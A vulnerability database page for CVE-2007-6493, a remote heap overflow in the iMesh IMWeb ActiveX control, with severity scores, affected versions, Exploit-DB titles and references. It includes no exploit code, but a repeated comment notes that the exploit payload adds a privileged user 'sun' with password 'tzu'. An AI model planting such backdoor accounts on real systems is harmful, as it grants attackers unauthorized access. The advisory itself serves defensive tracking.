CVE-2007-6493
Published 2007-12-20
Priority: P3 · 50 · critical
CVSS 2.0: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 6.76% (93.2th percentile)
The IMWeb.IMWebControl.1 ActiveX control in IMWeb.dll 7.0.0.x, and possibly IMWebControl.dll, in iMesh 7.1.0.x and earlier allows remote attackers to execute arbitrary code via a certain argument to the SetHandler method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| imesh.com | imesh | <= 7.1.0.37263 | — |
No detection rules found.
Exploit-DB
iMesh 7.1.0.x - 'IMWeb.dll 7.0.0.x' Remote Heap Overflow
exploitdb·2007-12-18
---
//add su one, user: sun pass: tzu
Exploit-DB
iMesh 7 - 'IMWebControl' ActiveX Control Code Execution
exploitdb·2007-12-17
---
source: https://www.securityfocus.com/bid/26916/info
iMesh is prone to a code-execution vulnerability because the application fails to sanitize user-supplied data, which can lead to memory corruption.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 7.1.0.37263 and prior versions are reported affected by this issue.
//add su one, user: sun pass: tzu
No writeups or analysis indexed.
http://osvdb.org/40239
http://retrogod.altervista.org/rgod_imesh.html
http://secunia.com/advisories/28134
http://www.securityfocus.com/archive/1/485261/100/0/threaded
http://www.vupen.com/english/advisories/2007/4240